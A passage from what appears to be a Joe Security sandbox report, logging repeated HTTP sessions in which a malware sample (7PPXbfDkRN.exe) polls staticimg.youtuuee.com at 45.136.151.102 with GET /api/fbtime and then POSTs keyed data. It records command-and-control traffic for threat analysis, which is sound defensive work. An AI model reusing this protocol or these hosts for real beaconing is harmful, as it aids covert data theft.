Oct 24, 2021 09:46:15.203010082 CEST
1325 IN HTTP/1.1 200 OKServer: nginxDate: Sun, 24 Oct 2021 07:46:15 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingX-Powered-By: PHP/7.4.21Data Raw: 33 35 0d 0a 7b 22 73 69 64 22 3a 32 31 34 39 33 31 31 2c 22 74 69 6d 65 22 3a 31 36 33 35 30 36 31 35 37 35 2c 22 72 61 6e 64 5f 73 74 72 22 3a 22 4d 4a 77 39 36 5a 22 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: 35{"sid":2149311,"time":1635061575,"rand_str":"MJw96Z"}0
Oct 24, 2021 09:46:15.348901987 CEST
1325 OUT POST /api/?sid=2149311&key=51597f4ebba3856d49b8f376ed79ffcd HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60Content-Length: 289Host: staticimg.youtuuee.com
Oct 24, 2021 09:46:15.500364065 CEST
1326 IN HTTP/1.1 200 OKServer: nginxDate: Sun, 24 Oct 2021 07:46:15 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingX-Powered-By: PHP/7.4.21Data Raw: 63 0d 0a 7b 22 73 74 61 74 75 73 22 3a 33 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: c{"status":3}0
Session ID Source IP Source Port Destination IP Destination Port Process
30 192.168.2.5 49784 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe
TimestampkBytestransferred Direction Data
Oct 24, 2021 09:46:47.728708982 CEST
1418 OUT GET /api/fbtime HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60Host: staticimg.youtuuee.com
Oct 24, 2021 09:46:47.883045912 CEST
1419 IN HTTP/1.1 200 OKServer: nginxDate: Sun, 24 Oct 2021 07:46:47 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingX-Powered-By: PHP/7.4.21Data Raw: 33 35 0d 0a 7b 22 73 69 64 22 3a 32 31 35 30 38 36 37 2c 22 74 69 6d 65 22 3a 31 36 33 35 30 36 31 36 30 37 2c 22 72 61 6e 64 5f 73 74 72 22 3a 22 46 68 61 6e 45 43 22 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: 35{"sid":2150867,"time":1635061607,"rand_str":"FhanEC"}0
Oct 24, 2021 09:46:47.894747019 CEST
1419 OUT POST /api/?sid=2150867&key=063d31afe0e24621c7d74dbaf75408d0 HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60Content-Length: 289Host: staticimg.youtuuee.com
Copyright Joe Security LLC 2021 Page 41 of 58
Oct 24, 2021 09:46:48.056725025 CEST
1420 IN HTTP/1.1 200 OKServer: nginxDate: Sun, 24 Oct 2021 07:46:47 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingX-Powered-By: PHP/7.4.21Data Raw: 63 0d 0a 7b 22 73 74 61 74 75 73 22 3a 33 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: c{"status":3}0
TimestampkBytestransferred Direction Data
Session ID Source IP Source Port Destination IP Destination Port Process
31 192.168.2.5 49785 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe
TimestampkBytestransferred Direction Data
Oct 24, 2021 09:46:48.383100033 CEST
1420 OUT GET /api/fbtime HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60Host: staticimg.youtuuee.com
Oct 24, 2021 09:46:48.527046919 CEST
1421 IN HTTP/1.1 200 OKServer: nginxDate: Sun, 24 Oct 2021 07:46:48 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingX-Powered-By: PHP/7.4.21Data Raw: 33 35 0d 0a 7b 22 73 69 64 22 3a 32 31 35 30 39 30 37 2c 22 74 69 6d 65 22 3a 31 36 33 35 30 36 31 36 30 38 2c 22 72 61 6e 64 5f 73 74 72 22 3a 22 6b 55 76 64 65 78 22 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: 35{"sid":2150907,"time":1635061608,"rand_str":"kUvdex"}0
Oct 24, 2021 09:46:48.538640976 CEST
1421 OUT POST /api/?sid=2150907&key=021ad353d9168c6646a91ee81aef17bd HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60Content-Length: 289Host: staticimg.youtuuee.com
Oct 24, 2021 09:46:48.688570976 CEST
1422 IN HTTP/1.1 200 OKServer: nginxDate: Sun, 24 Oct 2021 07:46:48 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingX-Powered-By: PHP/7.4.21Data Raw: 63 0d 0a 7b 22 73 74 61 74 75 73 22 3a 33 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: c{"status":3}0
Session ID Source IP Source Port Destination IP Destination Port Process
32 192.168.2.5 49786 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe
TimestampkBytestransferred Direction Data
Oct 24, 2021 09:46:49.005182028 CEST
1423 OUT GET /api/fbtime HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60Host: staticimg.youtuuee.com
Oct 24, 2021 09:46:49.163343906 CEST
1423 IN HTTP/1.1 200 OKServer: nginxDate: Sun, 24 Oct 2021 07:46:49 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingX-Powered-By: PHP/7.4.21Data Raw: 33 35 0d 0a 7b 22 73 69 64 22 3a 32 31 35 30 39 33 39 2c 22 74 69 6d 65 22 3a 31 36 33 35 30 36 31 36 30 39 2c 22 72 61 6e 64 5f 73 74 72 22 3a 22 45 4a 48 53 54 54 22 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: 35{"sid":2150939,"time":1635061609,"rand_str":"EJHSTT"}0
Oct 24, 2021 09:46:49.172435045 CEST
1424 OUT POST /api/?sid=2150939&key=ed9790a22aadd1de955b18ce8e9931a9 HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60Content-Length: 289Host: staticimg.youtuuee.com
Copyright Joe Security LLC 2021 Page 42 of 58
Oct 24, 2021 09:46:49.329922915 CEST
1424 IN HTTP/1.1 200 OKServer: nginxDate: Sun, 24 Oct 2021 07:46:49 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingX-Powered-By: PHP/7.4.21Data Raw: 63 0d 0a 7b 22 73 74 61 74 75 73 22 3a 33 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: c{"status":3}0
TimestampkBytestransferred Direction Data
Session ID Source IP Source Port Destination IP Destination Port Process
33 192.168.2.5 49787 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe
TimestampkBytestransferred Direction Data
Oct 24, 2021 09:46:49.640058994 CEST
1425 OUT GET /api/fbtime HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60Host: staticimg.youtuuee.com
Oct 24, 2021 09:46:49.786853075 CEST
1425 IN HTTP/1.1 200 OKServer: nginxDate: Sun, 24 Oct 2021 07:46:49 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingX-Powered-By: PHP/7.4.21Data Raw: 33 35 0d 0a 7b 22 73 69 64 22 3a 32 31 35 30 39 37 37 2c 22 74 69 6d 65 22 3a 31 36 33 35 30 36 31 36 30 39 2c 22 72 61 6e 64 5f 73 74 72 22 3a 22 7a 36 46 33 32 38 22 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: 35{"sid":2150977,"time":1635061609,"rand_str":"z6F328"}0
Oct 24, 2021 09:46:49.794687033 CEST
1426 OUT POST /api/?sid=2150977&key=4ee7a2d959cb4a10f673c7d88974a245 HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60Content-Length: 289Host: staticimg.youtuuee.com
Oct 24, 2021 09:46:49.950081110 CEST
1426 IN HTTP/1.1 200 OKServer: nginxDate: Sun, 24 Oct 2021 07:46:49 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingX-Powered-By: PHP/7.4.21Data Raw: 63 0d 0a 7b 22 73 74 61 74 75 73 22 3a 33 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: c{"status":3}0
Session ID Source IP Source Port Destination IP Destination Port Process
34 192.168.2.5 49788 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe
TimestampkBytestransferred Direction Data
Oct 24, 2021 09:46:50.273909092 CEST
1427 OUT GET /api/fbtime HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60Host: staticimg.youtuuee.com
Oct 24, 2021 09:46:50.421237946 CEST
1428 IN HTTP/1.1 200 OKServer: nginxDate: Sun, 24 Oct 2021 07:46:50 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingX-Powered-By: PHP/7.4.21Data Raw: 33 35 0d 0a 7b 22 73 69 64 22 3a 32 31 35 31 30 31 33 2c 22 74 69 6d 65 22 3a 31 36 33 35 30 36 31 36 31 30 2c 22 72 61 6e 64 5f 73 74 72 22 3a 22 4a 55 78 34 46 37 22 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: 35{"sid":2151013,"time":1635061610,"rand_str":"JUx4F7"}0
Oct 24, 2021 09:46:50.438482046 CEST
1428 OUT POST /api/?sid=2151013&key=46e6a5a1a8c4f08d053bfa44a82eaf14 HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60Content-Length: 289Host: staticimg.youtuuee.com
Copyright Joe Security LLC 2021 Page 43 of 58
Oct 24, 2021 09:46:50.593585968 CEST
1429 IN HTTP/1.1 200 OKServer: nginxDate: Sun, 24 Oct 2021 07:46:50 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingX-Powered-By: PHP/7.4.21Data Raw: 63 0d 0a 7b 22 73 74 61 74 75 73 22 3a 33 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: c{"status":3}0
TimestampkBytestransferred Direction Data
Session ID Source IP Source Port Destination IP Destination Port Process
35 192.168.2.5 49789 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe
TimestampkBytestransferred Direction Data
Oct 24, 2021 09:46:50.905320883 CEST
1430 OUT GET /api/fbtime HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60Host: staticimg.youtuuee.com
Oct 24, 2021 09:46:51.051181078 CEST
1430 IN HTTP/1.1 200 OKServer: nginxDate: Sun, 24 Oct 2021 07:46:50 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingX-Powered-By: PHP/7.4.21Data Raw: 33 35 0d 0a 7b 22 73 69 64 22 3a 32 31 35 31 30 35 35 2c 22 74 69 6d 65 22 3a 31 36 33 35 30 36 31 36 31 30 2c 22 72 61 6e 64 5f 73 74 72 22 3a 22 6a 54 5a 36 67 79 22 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: 35{"sid":2151055,"time":1635061610,"rand_str":"jTZ6gy"}0
Oct 24, 2021 09:46:51.059366941 CEST
1430 OUT POST /api/?sid=2151055&key=7cebe7828b58fe3eef762f25303a291a HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60Content-Length: 289Host: staticimg.youtuuee.com
Oct 24, 2021 09:46:51.219743013 CEST
1431 IN HTTP/1.1 200 OKServer: nginxDate: Sun, 24 Oct 2021 07:46:51 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingX-Powered-By: PHP/7.4.21Data Raw: 63 0d 0a 7b 22 73 74 61 74 75 73 22 3a 33 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: c{"status":3}0
Session ID Source IP Source Port Destination IP Destination Port Process
36 192.168.2.5 49790 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe
TimestampkBytestransferred Direction Data
Oct 24, 2021 09:46:51.530956984 CEST
1432 OUT GET /api/fbtime HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60Host: staticimg.youtuuee.com
Oct 24, 2021 09:46:51.677324057 CEST
1432 IN HTTP/1.1 200 OKServer: nginxDate: Sun, 24 Oct 2021 07:46:51 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingX-Powered-By: PHP/7.4.21Data Raw: 33 35 0d 0a 7b 22 73 69 64 22 3a 32 31 35 31 30 39 35 2c 22 74 69 6d 65 22 3a 31 36 33 35 30 36 31 36 31 31 2c 22 72 61 6e 64 5f 73 74 72 22 3a 22 75 6e 4a 32 4d 66 22 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: 35{"sid":2151095,"time":1635061611,"rand_str":"unJ2Mf"}0
Oct 24, 2021 09:46:51.685113907 CEST
1433 OUT POST /api/?sid=2151095&key=7c9887cd3cb16aeb568a33c9ccd8c538 HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60Content-Length: 289Host: staticimg.youtuuee.com
Copyright Joe Security LLC 2021 Page 44 of 58
Oct 24, 2021 09:46:51.835508108 CEST
1433 IN HTTP/1.1 200 OKServer: nginxDate: Sun, 24 Oct 2021 07:46:51 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingX-Powered-By: PHP/7.4.21Data Raw: 63 0d 0a 7b 22 73 74 61 74 75 73 22 3a 33 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: c{"status":3}0
TimestampkBytestransferred Direction Data
Session ID Source IP Source Port Destination IP Destination Port Process
37 192.168.2.5 49791 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe
TimestampkBytestransferred Direction Data
Oct 24, 2021 09:46:52.154023886 CEST
1434 OUT GET /api/fbtime HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60Host: staticimg.youtuuee.com
Oct 24, 2021 09:46:52.302098036 CEST
1435 IN HTTP/1.1 200 OKServer: nginxDate: Sun, 24 Oct 2021 07:46:52 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingX-Powered-By: PHP/7.4.21Data Raw: 33 35 0d 0a 7b 22 73 69 64 22 3a 32 31 35 31 31 33 39 2c 22 74 69 6d 65 22 3a 31 36 33 35 30 36 31 36 31 32 2c 22 72 61 6e 64 5f 73 74 72 22 3a 22 72 33 7a 62 39 79 22 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: 35{"sid":2151139,"time":1635061612,"rand_str":"r3zb9y"}0
Oct 24, 2021 09:46:52.310817957 CEST
1435 OUT POST /api/?sid=2151139&key=e095cad2278f925f7e4a191097cfde84 HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60Content-Length: 289Host: staticimg.youtuuee.com
Oct 24, 2021 09:46:52.470722914 CEST
1436 IN HTTP/1.1 200 OKServer: nginxDate: Sun, 24 Oct 2021 07:46:52 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingX-Powered-By: PHP/7.4.21Data Raw: 63 0d 0a 7b 22 73 74 61 74 75 73 22 3a 33 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: c{"status":3}0
Session ID Source IP Source Port Destination IP Destination Port Process
38 192.168.2.5 49792 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe
TimestampkBytestransferred Direction Data
Oct 24, 2021 09:46:52.784478903 CEST
1437 OUT GET /api/fbtime HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60Host: staticimg.youtuuee.com
Oct 24, 2021 09:46:52.932136059 CEST
1437 IN HTTP/1.1 200 OKServer: nginxDate: Sun, 24 Oct 2021 07:46:52 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingX-Powered-By: PHP/7.4.21Data Raw: 33 35 0d 0a 7b 22 73 69 64 22 3a 32 31 35 31 31 37 37 2c 22 74 69 6d 65 22 3a 31 36 33 35 30 36 31 36 31 32 2c 22 72 61 6e 64 5f 73 74 72 22 3a 22 79 79 64 7a 35 63 22 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: 35{"sid":2151177,"time":1635061612,"rand_str":"yydz5c"}0
Oct 24, 2021 09:46:52.938849926 CEST
1437 OUT POST /api/?sid=2151177&key=a71f58dbe888f846ae5846e444e1e656 HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60Content-Length: 289Host: staticimg.youtuuee.com
Copyright Joe Security LLC 2021 Page 45 of 58
Oct 24, 2021 09:46:53.089015007 CEST
1438 IN HTTP/1.1 200 OKServer: nginxDate: Sun, 24 Oct 2021 07:46:53 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingX-Powered-By: PHP/7.4.21Data Raw: 63 0d 0a 7b 22 73 74 61 74 75 73 22 3a 33 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: c{"status":3}0
TimestampkBytestransferred Direction Data
Session ID Source IP Source Port Destination IP Destination Port Process
39 192.168.2.5 49793 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe
TimestampkBytestransferred Direction Data
Oct 24, 2021 09:46:53.411200047 CEST
1439 OUT GET /api/fbtime HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60Host: staticimg.youtuuee.com
Oct 24, 2021 09:46:53.569130898 CEST
1439 IN HTTP/1.1 200 OKServer: nginxDate: Sun, 24 Oct 2021 07:46:53 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingX-Powered-By: PHP/7.4.21Data Raw: 33 35 0d 0a 7b 22 73 69 64 22 3a 32 31 35 31 32 30 39 2c 22 74 69 6d 65 22 3a 31 36 33 35 30 36 31 36 31 33 2c 22 72 61 6e 64 5f 73 74 72 22 3a 22 46 66 78 51 4e 6e 22 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: 35{"sid":2151209,"time":1635061613,"rand_str":"FfxQNn"}0
Oct 24, 2021 09:46:53.582036972 CEST
1440 OUT POST /api/?sid=2151209&key=414c662eb1fa32ce4fe76d6805230a51 HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60Content-Length: 289Host: staticimg.youtuuee.com
Oct 24, 2021 09:46:53.740051985 CEST
1440 IN HTTP/1.1 200 OKServer: nginxDate: Sun, 24 Oct 2021 07:46:53 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingX-Powered-By: PHP/7.4.21Data Raw: 63 0d 0a 7b 22 73 74 61 74 75 73 22 3a 33 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: c{"status":3}0
Session ID Source IP Source Port Destination IP Destination Port Process
4 192.168.2.5 49752 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe
TimestampkBytestransferred Direction Data
Oct 24, 2021 09:46:16.084330082 CEST
1327 OUT GET /api/fbtime HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60Host: staticimg.youtuuee.com
Oct 24, 2021 09:46:16.232496023 CEST
1327 IN HTTP/1.1 200 OKServer: nginxDate: Sun, 24 Oct 2021 07:46:16 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingX-Powered-By: PHP/7.4.21Data Raw: 33 35 0d 0a 7b 22 73 69 64 22 3a 32 31 34 39 33 34 33 2c 22 74 69 6d 65 22 3a 31 36 33 35 30 36 31 35 37 36 2c 22 72 61 6e 64 5f 73 74 72 22 3a 22 75 57 4a 74 4b 61 22 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: 35{"sid":2149343,"time":1635061576,"rand_str":"uWJtKa"}0
Oct 24, 2021 09:46:16.322035074 CEST
1328 OUT POST /api/?sid=2149343&key=522b94416aa18897bef2f92ed75a7b55 HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60Content-Length: 289Host: staticimg.youtuuee.com
Copyright Joe Security LLC 2021 Page 46 of 58
Oct 24, 2021 09:46:16.475416899 CEST
1328 IN HTTP/1.1 200 OKServer: nginxDate: Sun, 24 Oct 2021 07:46:16 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingX-Powered-By: PHP/7.4.21Data Raw: 63 0d 0a 7b 22 73 74 61 74 75 73 22 3a 33 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: c{"status":3}0
TimestampkBytestransferred Direction Data
Session ID Source IP Source Port Destination IP Destination Port Process
40 192.168.2.5 49794 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe
TimestampkBytestransferred Direction Data
Oct 24, 2021 09:46:54.040618896 CEST
1441 OUT GET /api/fbtime HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60Host: staticimg.youtuuee.com
Oct 24, 2021 09:46:54.190620899 CEST
1442 IN HTTP/1.1 200 OKServer: nginxDate: Sun, 24 Oct 2021 07:46:54 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingX-Powered-By: PHP/7.4.21Data Raw: 33 35 0d 0a 7b 22 73 69 64 22 3a 32 31 35 31 32 36 35 2c 22 74 69 6d 65 22 3a 31 36 33 35 30 36 31 36 31 34 2c 22 72 61 6e 64 5f 73 74 72 22 3a 22 49 51 4e 7a 37 6a 22 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: 35{"sid":2151265,"time":1635061614,"rand_str":"IQNz7j"}0
Oct 24, 2021 09:46:54.211215019 CEST
1442 OUT POST /api/?sid=2151265&key=03d3bf4050b9f515c87ca732bd77f2cf HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60Content-Length: 289Host: staticimg.youtuuee.com
Oct 24, 2021 09:46:54.366297960 CEST
1443 IN HTTP/1.1 200 OKServer: nginxDate: Sun, 24 Oct 2021 07:46:54 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingX-Powered-By: PHP/7.4.21Data Raw: 63 0d 0a 7b 22 73 74 61 74 75 73 22 3a 33 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: c{"status":3}0
Session ID Source IP Source Port Destination IP Destination Port Process
41 192.168.2.5 49795 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe
TimestampkBytestransferred Direction Data
Oct 24, 2021 09:46:54.667601109 CEST
1444 OUT GET /api/fbtime HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60Host: staticimg.youtuuee.com
Oct 24, 2021 09:46:54.817378044 CEST
1444 IN HTTP/1.1 200 OKServer: nginxDate: Sun, 24 Oct 2021 07:46:54 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingX-Powered-By: PHP/7.4.21Data Raw: 33 35 0d 0a 7b 22 73 69 64 22 3a 32 31 35 31 33 31 39 2c 22 74 69 6d 65 22 3a 31 36 33 35 30 36 31 36 31 34 2c 22 72 61 6e 64 5f 73 74 72 22 3a 22 52 48 71 65 56 78 22 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: 35{"sid":2151319,"time":1635061614,"rand_str":"RHqeVx"}0
Oct 24, 2021 09:46:54.836503983 CEST
1444 OUT POST /api/?sid=2151319&key=1a5f4c87eb0f37dc049eed9c4db37b02 HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60Content-Length: 289Host: staticimg.youtuuee.com
Copyright Joe Security LLC 2021 Page 47 of 58
Oct 24, 2021 09:46:54.991520882 CEST
1445 IN HTTP/1.1 200 OKServer: nginxDate: Sun, 24 Oct 2021 07:46:54 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingX-Powered-By: PHP/7.4.21Data Raw: 63 0d 0a 7b 22 73 74 61 74 75 73 22 3a 33 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: c{"status":3}0
TimestampkBytestransferred Direction Data
Session ID Source IP Source Port Destination IP Destination Port Process
42 192.168.2.5 49796 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe
TimestampkBytestransferred Direction Data
Oct 24, 2021 09:46:55.309187889 CEST
1446 OUT GET /api/fbtime HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60Host: staticimg.youtuuee.com
Oct 24, 2021 09:46:55.454819918 CEST
